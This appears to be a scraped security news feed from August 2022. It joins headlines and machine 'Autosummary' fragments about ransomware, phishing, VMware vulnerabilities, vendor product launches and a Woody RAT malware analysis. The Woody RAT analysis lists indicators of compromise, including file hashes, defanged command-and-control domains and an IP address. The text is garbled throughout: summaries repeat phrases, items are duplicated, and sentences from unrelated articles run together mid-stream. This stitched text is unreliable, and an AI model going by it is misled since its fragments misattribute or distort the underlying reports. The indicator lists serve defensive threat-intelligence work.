It also helps synchronize with CMDBs, detect security gaps like unauthorized or end-of-support software, open ports, remotely exploitable vulnerabilities, digital certificate issues, unsanctioned apps and domains, and mitigate risk by taking appropriate actions. "Rimini Street has launched Rimini Protect, a new suite of security solutions that is always on and provides a layer of security that surrounds and protects enterprise IT infrastructure and applications. Rimini Street has provided “zero-day” security solutions for our clients’ enterprise software applications, middleware, and databases, and these solutions are now available with additional new offerings in the new Rimini Protect suite. Security protection is a top priority A data breach can harm organizations … More
The post Rimini Protect provides zero-day security protection against known and unknown vulnerabilities appeared first on Help Net Security.
"Autosummary:
Some organizations still primarily rely on reports and patches from their software vendor for protection against attacks, but this strategy may have several shortcomings: Dangerous limitations – do not address custom code, unsupported releases, or unknown vulnerabilities – do not address custom code, unsupported releases, or unknown vulnerabilities Not timely – can take weeks, months, or even years to be delivered by a software vendor – and sometimes no patch is provided at all – can take weeks, months, or even years to be delivered by a software vendor – and sometimes no patch is provided at all Labor-intensive – may require a product or technology upgrade and might need to be regression tested before rolling into production – may require a product or technology upgrade and might need to be regression tested before rolling into production Ongoing risk – may not be adequate to sufficiently protect against an identified vulnerability Rimini Street is already a trusted partner for security Organizations trust Rimini Street with supporting their mission-critical applications and data, and many of those clients have already expanded their Rimini Street relationship to include security solutions. "Autosummary:
"Autosummary:
Mirai-based, but different The new botnet was discovered in the wild by threat hunters at Fortinet, who noticed the IoT malware featured some unusual SSH-related strings and decided to investigate further. "Autosummary:
"Autosummary:
"Malwarebytes security experts answer some of your most frequently asked questions about ransomware and how our EDR can help.
The post Ransomware protection with Malwarebytes EDR: Your FAQs, answered! appeared first on Malwarebytes Labs.
"Autosummary:
Fourth, it should have features that are valuable for detecting and thwarting malware in general, such as exploit prevention, behavioral detection of never-before-seen malware, malicious website blocking, and brute force protection.”And perhaps most importantly, all of this is offered through the ‘single pane of glass’ that Zamani mentioned earlier—meaning you can easily manage endpoints to prevent threats from entering, detect infections that find their way into your environment, and remediate with one click, keeping your servers and workstations secure against ransomware while keeping your end users productive.”Ransomware, on the other hand, immediately encrypts files and sometimes locks down vital system settings used for recovery, as well as deleting locally stored backups, and it’s often used against multiple endpoints at the same time. David Pier, Senior Sales Engineer at Malwarebytes: “That is something we hear very frequently at Malwarebytes; customers are coming from other EDR solutions or other security solutions, and a large concern is your team may only be two to three, maybe five people at most. "Immediate Actions You Can Take Now to Protect Against Malware:
• Patch all systems and prioritize patching known exploited vulnerabilities.
• Enforce multifactor authentication (MFA).
• Secure Remote Desktop Protocol (RDP) and other risky services.
• Make offline backups of your data.
• Provide end-user awareness and training about social engineering and phishing.
This joint Cybersecurity Advisory (CSA) was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC). This advisory provides details on the top malware strains observed in 2021. Malware, short for “malicious software,” can compromise a system by performing an unauthorized function or process. Malicious cyber actors often use malware to covertly compromise and then gain access to a computer or mobile device. Some examples of malware include viruses, worms, Trojans, ransomware, spyware, and rootkits.[1]
In 2021, the top malware strains included remote access Trojans (RATs), banking Trojans, information stealers, and ransomware. Most of the top malware strains have been in use for more than five years with their respective code bases evolving into multiple variations. The most prolific malware users are cyber criminals, who use malware to deliver ransomware or facilitate theft of personal and financial information.
CISA and ACSC encourage organizations to apply the recommendations in the Mitigations sections of this joint CSA. These mitigations include applying timely patches to systems, implementing user training, securing Remote Desktop Protocol (RDP), patching all systems especially for known exploited vulnerabilities, making offline backups "
Autosummary:
Some examples of malware include viruses, worms, Trojans, ransomware, spyware, and rootkits.[1] In 2021, the top malware strains included remote access Trojans (RATs), banking Trojans, information stealers, and ransomware. "In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a multilayered phishing campaign targeting cryptocurrency exchange Coinbase. Attackers are sending out spoofed Coinbase emails to harvest personal credentials and use them to log into users’ legitimate accounts in real-time. How the Coinbase phishing attack works The attackers present users with a notification that their account needed attention due to an urgent matter (ex: locked account, transaction confirmation). Users were … More
The post Phishing campaign targets Coinbase wallet holders to steal cryptocurrency in real-time appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Are you on Tinder? With 75 million monthly active users, you might be able to find the right one. However there are also traps you need to look out for. Read more about catfishing, sextortion, phishing and other practices used by scammers.
The post Don’t get singed by scammers while you’re carrying the torch for Tinder appeared first on WeLiveSecurity
"Autosummary:
pic.twitter.com/9nDDQtCtky — Twist (@Twist_83) August 2, 2021 Sextortion “Sending nudes” and “sexting,” two activities that are just as popular as they are deeply risky, make you an easy target for scammers to take advantage of.Remember, if you’re going to play with matches, make sure you don’t get burned For more information and tips to stay safe while surfing for love, come back next week, as we will cover dating apps privacy settings.This is what we’ve seen recently on the Netflix documentary Tinder Swindler, which tells the story of several women scammed by the same man — a real person, a profile with several pictures, linked social media accounts and even photo verification, who managed to steal US$10 million after love bombing his victims and luring them into financing his luxury lifestyle.https://t.co/XD3xWnwKJw #DataSpotlight #ValentinesDay2022 pic.twitter.com/zykQmNwlfn — FTC (@FTC) February 11, 2022 The human factor Truth be told, we all portray our best self when going on a date, hiding that ugly side we all seem to have.Generally, these profiles use stock images that seem like they come directly from a model agency catalog or, taking the opposite path, they use super amateur, blurry and sexually suggestive images. "Taiwan government websites were temporarily forced offline by cyber attacks during the visit to Taipei of US House Speaker Nancy Pelosi. Major Taiwan government websites were temporarily forced offline by distributed denial of service (DDoS) attacks attacks during the visit to Taipei of US House Speaker Nancy Pelosi. The cyber attacks forced offline the government […]
The post Taiwan Government websites suffered DDoS attacks during the Nancy Pelosi visit appeared first on Security Affairs.
"Autosummary:
The group (also known as Cicada, Stone Panda, MenuPass group, Bronze Riverside, and Cloud Hopper) has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. "BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared
The post Ransomware review: July 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by group, July 2022 Known ransomware attacks by country, July 2022 Known ransomware attacks by industry sector, July 2022 LockBit We wrote extensively about LockBit, and the appearance of LockBit 3.0, in last month’s ransomware review.Posted: August 4, 2022 by BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. Two other gangs linked to Conti, Hive and KaraKurt, were also very active during July, ensuring that the gang behind “the costliest strain of ransomware ever documented” by the FBI continues to cast a long shadow, despite the retirement of the Conti “brand”. "Seemplicity announced that it has partnered with Checkmarx, a provider of developer-centric application security testing (AST) solutions. The partnership will see the Checkmarx One Platform integrated within Seemplicity’s Productivity Platform, allowing joint customers to simplify the entire find-to-fix lifecycle and ultimately accelerate the time to remediation of vulnerabilities found throughout the software development lifecycle (SDLC). The integration brings security findings discovered by Checkmarx into Seemplicity’s platform that provides a unified picture and workspace for risks … More
The post Seemplicity collaborates with Checkmarx to improve visibility and operational efficiency for organizations appeared first on Help Net Security.
"Autosummary:
"Kion has partnered with Booz Allen Hamilton. This partnership will join Kion’s cloud enablement solution with Booz Allen’s technology transformation and managed services expertise to provide government clients with complete cloud management and governance capabilities. As application migration initiatives and the adoption of cloud-native capabilities accelerate across the public sector, more agencies are facing challenges in their multi-cloud environments. These challenges include manual labor to manage daily operations and security threats, along with a lack … More
The post Kion and Booz Allen Hamilton help government agencies manage their multi-cloud environments appeared first on Help Net Security.
"Autosummary:
“Kion is a self-hosted software solution that works across AWS, Azure, and Google Cloud, along with air-gapped regions deployed across different security fabrics – attributes that are extremely important to our government customers,” said Brian Price, CEO and co-founder of Kion. "Autosummary:
LTE Series Vigor2862 Series Vigor2862 LTE Series Vigor2620 LTE Series VigorLTE 200n Vigor2133 Series Vigor2762 Series Vigor167 Vigor130 VigorNIC 132 Vigor165 Vigor166 Vigor2135 Series Vigor2765 Series Vigor2766 "Categories: Threat Intelligence Tags: conti Tags: lockbit Tags: ransomware BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared |
The post Ransomware review: July 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by group, July 2022 Known ransomware attacks by country, July 2022 Known ransomware attacks by industry sector, July 2022 LockBit We wrote extensively about LockBit, and the appearance of LockBit 3.0, in last month"s ransomware review.Posted: August 4, 2022 by BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. Two other gangs linked to Conti, Hive and KaraKurt, were also very active during July, ensuring that the gang behind “the costliest strain of ransomware ever documented” by the FBI continues to cast a long shadow, despite the retirement of the Conti "brand". "Categories: Business Tags: Anti-Ransomware Tags: business Tags: detection Tags: EDR Tags: Nebula Tags: prevention Tags: ransomware Malwarebytes security experts answer some of your most frequently asked questions about ransomware and how our EDR can help. |
The post Ransomware protection with Malwarebytes EDR: Your FAQs, answered! appeared first on Malwarebytes Labs.
"Autosummary:
Fourth, it should have features that are valuable for detecting and thwarting malware in general, such as exploit prevention, behavioral detection of never-before-seen malware, malicious website blocking, and brute force protection.”And perhaps most importantly, all of this is offered through the ‘single pane of glass’ that Zamani mentioned earlier—meaning you can easily manage endpoints to prevent threats from entering, detect infections that find their way into your environment, and remediate with one click, keeping your servers and workstations secure against ransomware while keeping your end users productive.”Ransomware, on the other hand, immediately encrypts files and sometimes locks down vital system settings used for recovery, as well as deleting locally stored backups, and it"s often used against multiple endpoints at the same time. David Pier, Senior Sales Engineer at Malwarebytes: “That is something we hear very frequently at Malwarebytes; customers are coming from other EDR solutions or other security solutions, and a large concern is your team may only be two to three, maybe five people at most. "Venafi announced the findings of a dark web investigation into ransomware spread via malicious macros. Conducted in partnership with criminal intelligence provider Forensic Pathways between November 2021 and March 2022, the research analyzed 35 million dark web URLs, including marketplaces and forums, using the Forensic Pathways Dark Search Engine. The findings uncovered 475 webpages of sophisticated ransomware products and services, with several high-profile groups aggressively marketing ransomware-as-a-service. 87% of the ransomware found on the dark … More
The post 87% of the ransomware found on the dark web has been delivered via malicious macros appeared first on Help Net Security.
"Autosummary:
Many strains of ransomware being sold — such as Babuk, GoldenEye, Darkside/BlackCat, Egregor, HiddenTear and WannaCry — have been successfully used in high-profile attacks. "Claroty released Claroty xDome, a cloud-based industrial cybersecurity platform that drives cyber and operational resilience for modern industrial enterprises. Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin … More
The post Claroty xDome strengthens cyber and operational resilience for industrial enterprises appeared first on Help Net Security.
"Autosummary:
Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin critical infrastructure have become more digitized and connected — either to enterprise IT systems and/or to each other — creating cyber-physical systems.While other SaaS solutions rely solely on passive monitoring, xDome offers this plus other methods, giving customers both effective asset discovery and the ease and scalability of SaaS. A complete XIoT asset inventory is foundational to CPS security, and attaining it requires combining multiple asset discovery methods tailored to each environment’s unique needs. "Autosummary:
"The root cause is still not clear, but it appears to be due to a flaw in certain wallet software – rather than in the Solana blockchain itself" - Elliptic One clue that emerged from the attack is that the money-siphoning transactions are signed by the rightful owners, which points to a private key compromise. "Autosummary:
Software engineer Stephen Lacy first publicized the finding (Twitter) While reviewing an open source project Lacy had "found off a google search," the engineer noticed the following URL in the code that he shared on Twitter: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru BleepingComputer, like many, observed that when searching GitHub for this URL, there were 35,000+ search results showing files containing the malicious URL. "VMware has released fixes for ten vulnerabilities, including CVE-2022-31656, an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation, which the company considers critical and advises to patch or mitigate immediately. While there is no indication that any of these flaws is currently being leveraged by attackers in the wild, the security researcher who reported CVE-2022-31656 is planning to release a technical writeup and a POC “soon”. About CVE-2022-31656 CVE-2022-31656 is … More
The post VMware: Patch this critical vulnerability immediately! (CVE-2022-31656) appeared first on Help Net Security.
"Autosummary:
"An ongoing, large-scale phishing campaign is targeting owners of business email accounts at companies in the FinTech, Lending, Insurance, Energy and Manufacturing sectors in the US, UK, New Zealand and Australia, Zscaler researchers are warning. The attackers are using a variety of tecniques and tactics to evade corporate email security solutions and a custom phishing kit that allows them to bypass multi-factor authentication (MFA) protection to hijack enterprise Microsoft accounts. Post compromise, the attackers have … More
The post Phishers use custom phishing kit to hijack MFA-protected enterprise Microsoft accounts appeared first on Help Net Security.
"Autosummary:
An ongoing, large-scale phishing campaign is targeting owners of business email accounts at companies in the FinTech, Lending, Insurance, Energy and Manufacturing sectors in the US, UK, New Zealand and Australia, Zscaler researchers are warning. "Autosummary:
Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed. "Autosummary:
The other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate. "Autosummary:
The phishing campaign"s targets include fin-tech, lending, accounting, insurance, and Federal Credit Union organizations in the US, UK, New Zealand, and Australia. "Autosummary:
"We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. Here"s what to look out for.
The post Bank fraud scammers trick victims with claims of bogus Zelle transfers appeared first on Malwarebytes Labs.
"Autosummary:
, address, and other information doesn’t mean the caller is genuine.Posted: August 3, 2022 by We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call.The call also spoofs the caller ID of the bank, another easy-to-pull-off tactic which makes the call look more plausible. "Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattck. Semikron is a German-based independent manufacturer of power semiconductor components, it employs more than 3,000 people in 24 subsidiaries worldwide, with production sites in Germany, Brazil, China, France, India, Italy, Slovakia and the USA. The company confirmed it has suffered a cyberattack conducted by a professional […]
The post Power semiconductor component manufacturer Semikron suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Woody Rat distribution vectors (Malwarebytes LABS) Its list of features includes collecting system information, listing folders and running processes, executing commands and files received from its command-and-control (C2) server, downloading, uploading, and deleting files on infected machines, and taking screenshots. "Autosummary:
Genuine site left, fake site right As for how people end up there, it might be through malvertising on social media, direct messages on various platforms, SEO poisoning, or spam email. "Autosummary:
"Autosummary:
After a bit of digging, BleepingComputer also discovered that .appref-ms, .bat, .cmd, .chm, .cpl, .js, .jse, .msc, .msp, .reg, .vbe, .vbs, .wsf "The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.
The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.
"Autosummary:
IOCs Woody Rat: 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d C2s: kurmakata.duckdns[.]org microsoft-ru-data[.]ru 194.36.189.179 microsoft-telemetry[.]ru oakrussia[.]ru Follina Doc: Памятка.docx ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb Follina html file: garmandesar.duckdns[.]org:444/uoqiuwef.html Woody Rat url: fcloud.nciinform[.]ru/main.css (edited) Data sent via submit API includes: OS Architecture Antivirus installed Computer Name OS Build Version .NET information PowerShell information Python information (Install path, version etc.) Environment Variables Network Interfaces Administrator privileges List of running processes Proxy information Username List of all the User accounts The malware currently detects 6 AVs through Registry Keys; Document lure Woody Rat Analysis The threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat: Debug Information A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat: Woody Rat distribution methods Archive files In this method, Woody Rat is packaged into an archive file and sent to victims. RSA Encryption routine AES Encryption Routine C2 HTTP endpoint request knock – This is the first HTTP request that the malware makes to the C2. Command execution routine _SET Commands PING – This command is used to set the sleep interval between every ping request to the C2. EXEC command UPLD (Upload) – The Upload command is used to remotely upload a file to the infected machine. _REQ Commands EXEC (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. get_cookie_data function Data encryption with HTTP requests To evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. "Categories: Threat Intelligence Tags: APT Tags: rat Tags: russia The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities. |
The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.
"Autosummary:
IOCs WoodyRat: 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d C2s: kurmakata.duckdns[.]org microsoft-ru-data[.]ru 194.36.189.179 microsoft-telemetry[.]ru oakrussia[.]ru Follina Doc: Памятка.docx ffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb Follina html file: garmandesar.duckdns[.]org:444/uoqiuwef.html Woody Rat url: fcloud.nciinform[.]ru/main.css (edited)Data sent via submit API includes: OS Architecture Antivirus installed Computer Name OS Build Version .NET information PowerShell information Python information (Install path, version etc.) Environment Variables Network Interfaces Administrator privileges List of running processes Proxy information Username List of all the User accounts The malware currently detects 6 AVs through Registry Keys; Document lure Woody Rat Analysis The threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat: Debug Information A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat: Woody Rat distribution methods Archive files In this method, Woody Rat is packaged into an archive file and sent to victims. RSA Encryption routine AES Encryption Routine C2 HTTP endpoint request knock - This is the first HTTP request that the malware makes to the C2. get_cookie_data function Data encryption with HTTP requests To evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. _REQ Commands EXEC (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes.The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs: SharpExecutor and PowerSession methods We will look at the commands utilising these DLLs below: DN_B (DotNet Binary) - Follina vulnerability The threat actor is using a Microsoft Office document (Памятка.docx) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat.PURG - Unknown command - Unknown command EXIT - Exit the command execution thread. "Categories: Social engineering Tags: bank Tags: phone Tags: scam We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. Here"s what to look out for. |
The post Bank fraud scammers trick victims with claims of bogus Zelle transfers appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 3, 2022 by We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call.The call also spoofs the caller ID of the bank, another easy-to-pull-off tactic which makes the call look more plausible. "Categories: News Tags: PII Tags: smishing Tags: FCC Tags: SMS phishing Tags: Robokiller Tags: STIR Tags: SHAKEN Smishing attacks, or phishing attempts via SMS, are on the rise, and Americans are fighting off billions of spam messages each month. |
The post FCC warns of steep rise in phishing over SMS appeared first on Malwarebytes Labs.
"Autosummary:
How to protect yourself from #scam robotexts: ▪️ Do not respond ▪️ Do not click on any links ▪️ Do not provide any info ▪️ File an FCC complaint ▪️ Forward unwanted texts to SPAM (7726) ▪️ Delete all suspicious texts — The FCC (@FCC) July 28, 2022 When you receive a spam text, do not engage with the sender. "As the stock market dropped more than 20% in 2022 and prices rise at the pump and grocery store, there are some markets that have shown their ability to weather the storm and retain strong demand and growth even amongst broader market turmoil. One example of this: the cybersecurity market. In the first half of 2022, the cybersecurity industry saw venture capital funding continue to pour into the space, according to Momentum Cyber’s Market Review … More
The post State of cybersecurity funding in the first half of 2022 appeared first on Help Net Security.
"Autosummary:
Of the deals tracked, 37 raised more than $100 million and 14+ were put in the unicorn category, including Abnormal, Beyond Identity, JupiterOne, Material Security, Nord Security, Perimeter 81, Sonar, Teleport, and others.However, there were also seven more deals valued at more than $1B in the first half of 2022, including WatchGuard ($1.5B), Barracuda ($4B), Datto ($6.2B), Sailpoint ($6.9B), Mandiant ($5.3B) and others. "As the modern world evolves, more threats arise. Knowledge of cybersecurity and artificial intelligence (AI) has become crucial to a successful business. Businesses everywhere need true expertise to protect their data to avoid their competitors getting ahead. In this Help Net Security video, Taylor Hersom, CEO at Eden Data, discusses why we need AI and how it helps minimize human error, as well as cybersecurity threats such as ransomware.
The post How AI and cybersecurity complement each other appeared first on Help Net Security.
"Autosummary:
"Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-a-as-a-service model, it is used by different groups to drop additional malicious payloads on the compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt, and REvil (Sodinokibi) ransomware, Kronos trojans, […]
The post Gootkit AaaS malware is still active and uses updated tactics appeared first on Security Affairs.
"Autosummary:
“When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. "CryptoLocker. WannaCry. DarkSide. Conti. MedusaLocker. The ransomware threat isn’t going away anytime soon; the news brings constant reports of new waves of this pernicious type of malware washing across the world. It’s popular in large part because of the immediate financial payoff for attackers: It works by encrypting the files on your hard disk, then demands that you pay a ransom, frequently in Bitcoin or other cryptocurrency, to decrypt them.
But you needn’t be a victim. There’s plenty that Windows 10 and 11 users can do to protect themselves against it. In this article, I’ll show you how to keep yourself safe, including how to use an anti-ransomware tool built into Windows.
Autosummary:
Most backup and storage services, including Microsoft OneDrive, Google Drive, Carbonite, Dropbox and many others, use versioning.They can use the Group Policy Management Console, the Windows Security Center, or PowerShell to turn on Controlled Folder Access for users on a network, customize which folders should be protected, and let additional applications access the folders beyond the Microsoft defaults.From the screen that appears, click Add an allowed app, navigate to the executable file of the program you want to add, click Open, and then confirm you want to add the file. If you decide at any point to remove a folder, get back to the “Protected folders” screen, click the folder you want to remove, and then click Remove.They can only decrypt data that’s been encrypted with certain specific pieces or families of ransomware, including REvil/Sodinokibi, DarkSide, MaMoCrypt, WannaRen and several others.In addition to Documents, Windows system folders include Desktop, Music, Pictures, and Videos. Hint: If you’re not sure where executable files are located for programs you want to add to the whitelist, look for the folder name with the program’s name in the Windows\Program Files or Windows\Program Files (x86) folders, then look for an executable file in that folder.As with adding folders to the list of protected folders, you can remove the app by getting back to this screen, clicking the application you want to remove, then clicking Remove. By default, the feature is not turned on, so if you want to protect yourself against ransomware, you’ll have to tell it to get to work. "A new vulnerability found in GoLang-based applications allows a threat actor to bypass validations under certain conditions and gain unauthorized access to cloud-native applications, Oxeye researchers have found. The source of “ParseThru” – as the newly discovered vulnerability has been dubbed – is the use of unsafe URL parsing methods built in the language. About the “ParseThru” vulnerability GoLang is a popular cloud native programming language. It reduces the number of software development dependencies and … More
The post “ParseThru” vulnerability allows unauthorized access to cloud-native applications appeared first on Help Net Security.
"Autosummary:
Three identified vulnerable projects include: CNCF-graduated project Harbor, an open source registry that secures artifacts with policies and role-based access control Traefik, a modern http reverse proxy and load balancer that makes deploying microservices easy and Skipper, an http router and reverse proxy for service composition. "Autosummary:
"Autosummary:
Oliver Pinson-Roxburgh, CEO of Defense.com, the all-in-one cybersecurity platform, shares knowledge and advice in this article on how ransomware works, how damaging it can be, and how your business can mitigate ransomware attacks from occurring. Exploiting vulnerable systems Ransomware can also be deployed by exploiting unpatched and outdated systems, as was the case in 2017, when a security vulnerability in Microsoft Windows, EternalBlue (MS17-010), led to the global WannaCry ransomware attack that spread to over 150 countries. In summary With ransomware groups continually looking for vulnerabilities to exploit, it"s important that businesses develop robust strategies to prevent ransomware threats: ensure your staff takes regular security awareness training, set up threat monitoring tools to detect and alert you of vulnerabilities, and implement endpoint protection to protect your devices across your network. There are three key elements to a ransomware attack: Access In order to deploy malware to encrypt files and gain control, cybercriminals need to initially gain access to an organization"s systems. "Autosummary:
"Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike," researchers Julio Dantas, James Haughom, and Julien Reisdorffer said. "Autosummary:
The company also patched multiple other security bugs enabling attackers to gain remote code execution (CVE-2022-31658, CVE-2022-31659, CVE-2022-31665) and escalate privileges to "root" (CVE-2022-31660, CVE-2022-31661, CVE-2022-31664) on unpatched servers. "An affiliate of the LockBit 3.0 RaaS operation has been abusing the Windows Defender command-line tool to deploy Cobalt Strike payloads. During a recent investigation, SentinelOne researchers observed threat actors associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads. The attackers initially compromise the target […]
The post LockBit 3.0 affiliate sideloads Cobalt Strike through Windows Defender appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Legitimate installers laced with malware (VirusTotal) Based on VirusTotal stats, this practice also appears to be on the rise this year, using Google Chrome, Malwarebytes, Windows Updates, Zoom, Brave, Firefox, ProtonVPN, and Telegram as lures. "VMware patched a critical authentication bypass security flaw, tracked as CVE-2022-31656, impacting local domain users in multiple products. VMware has addressed a critical authentication bypass security flaw, tracked as CVE-2022-31656, impacting local domain users in multiple products. An unauthenticated attacker can exploit the vulnerability to gain admin privileges. “A malicious actor with network access to the […]
The post VMware fixed critical authentication bypass vulnerability appeared first on Security Affairs.
"Autosummary:
Remote Code Execution Vulnerability CVE-2022-31660 – Local Privilege Escalation Vulnerability CVE-2022-31661 – Local Privilege Escalation Vulnerability CVE-2022-31662 – Path traversal vulnerability CVE-2022-31663 – Cross-site scripting (XSS) vulnerability CVE-2022-31664 – Local Privilege Escalation Vulnerability CVE-2022-31665 – JDBC Injection Remote Code Execution Vulnerability The above issues impact the following products: VMware Workspace ONE Access (Access) VMware Workspace ONE Access Connector (Access Connector) VMware Identity Manager (vIDM) VMware Identity Manager Connector (vIDM Connector) "Accenture has acquired Tenbu. With more than 150 certifications, Tenbu’s team of 170 data specialists will join the Data & AI team within Accenture Cloud First. Terms of the acquisition were not disclosed. “Our goal is to help clients with total enterprise reinvention by building their digital core, optimizing operations and accelerating growth – and cloud data and AI are fundamental to a strong digital core,” said Karthik Narain, global lead for Accenture Cloud First. … More
The post Accenture acquires Tenbu to expand data and AI capabilities across the cloud continuum appeared first on Help Net Security.
"Autosummary:
"Netskope announced it has acquired Infiot, a pioneer in enabling secure access with zero trust security, network and application optimization, and AI-driven operations. As Netskope Borderless WAN, the addition of Infiot’s technology will enable Netskope customers to apply uniform security and quality of experience (QoE) policies to the widest range of hybrid work needs, from employees at home or on-the-go, to branch offices, ad-hoc point-of-sale systems, and multi-cloud environments. For customers, all of these capabilities … More
The post Netskope acquires Infiot to provide users with optimized connections between any enterprise location appeared first on Help Net Security.
"Autosummary:
Netskope Borderless WAN critical use cases include: Easy access to Netskope Intelligent SSE services powered by Netskope NewEdge infrastructure All-in-one intelligent access, routing, wireless WAN, network security, app assurance, and edge compute as an effective way to modernize, simplify and implement SASE architecture The ability to offload MPLS and eliminate costs by sending more traffic direct-to-net, eliminate backhauling and leverage fixed/mobile connectivity options (such as 4G/5G) Better guaranteed WAN connectivity to ensure end-to-end performance, from the “last mile” to the cloud or legacy data center Simplified operational overhead associated with running custom third-party applications “Today, leaders across IT, security, and networking and the world’s best-known analyst firms agree that the explosion of data and devices, along with the numerous ways that people connect, communicate, and collaborate, make the transformation of both networking and security a critical imperative for businesses and governments. Relevant to SASE growth, Gartner notes: “By 2024, 80% of SD-WAN deployments will incorporate SSE requirements, up from less than 25% in 2022” “By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s SSE platform” Despite SASE’s popularity, however, confusing vendor messaging often accompanies piecemeal product sets that are spuriously marketed as “SASE.” "Vade announced its H1 2022 Phishers’ Favorites report, a ranking of the top 25 most impersonated brands in phishing attacks. Microsoft came in at #1 on the list, followed by Facebook. Rounding out the top five are Crédit Agricole, WhatsApp, and Orange. Microsoft continues to be a top target 